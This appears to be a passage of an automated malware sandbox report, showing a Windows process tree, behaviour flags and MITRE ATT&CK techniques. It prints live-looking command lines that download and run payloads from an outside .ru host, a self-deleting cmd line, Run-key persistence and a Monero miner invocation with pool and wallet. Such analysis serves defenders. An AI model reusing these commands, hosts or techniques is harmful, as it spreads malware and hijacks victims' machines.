- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1836
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3296
-
C:\Users\Admin\AppData\Local\Temp\30A1.exeC:\Users\Admin\AppData\Local\Temp\30A1.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:600 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\30A1.exe" & exit2⤵PID:2548
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\4B4E.exeC:\Users\Admin\AppData\Local\Temp\4B4E.exe1⤵
- Executes dropped EXE
PID:720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 7962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\7DD9.exeC:\Users\Admin\AppData\Local\Temp\7DD9.exe1⤵
- Executes dropped EXE
PID:3052 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\7E61.bat C:\Users\Admin\AppData\Local\Temp\7DD9.exe"2⤵
- Modifies registry class
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1292
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1881\123.vbs"3⤵
- Blocklisted process makes network request
PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exe "/download" "http://a0617224.xsph.ru/SIrrWmclYBgYamm.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\1881\setup1.exesetup1.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2168 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd4⤵PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exe "/download" "http://a0617224.xsph.ru/c_setup.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\1881\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1976
-
-
C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exe "/download" "http://a0617224.xsph.ru/RMR.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:528
-
-
C:\Users\Admin\AppData\Local\Temp\1881\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:624 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:2924
-
-
-
C:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7E5F.tmp\7E60.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\8F10.exeC:\Users\Admin\AppData\Local\Temp\8F10.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
- Modifies system certificate store
PID:3900
-
-
C:\Users\Admin\AppData\Local\Temp\ABF0.exeC:\Users\Admin\AppData\Local\Temp\ABF0.exe1⤵
- Executes dropped EXE
PID:1712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 4002⤵
- Program crash
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\B538.exeC:\Users\Admin\AppData\Local\Temp\B538.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1296
-
C:\Users\Admin\AppData\Local\Temp\CB9F.exeC:\Users\Admin\AppData\Local\Temp\CB9F.exe1⤵
- Executes dropped EXE
PID:364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 4002⤵
- Program crash
PID:600
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1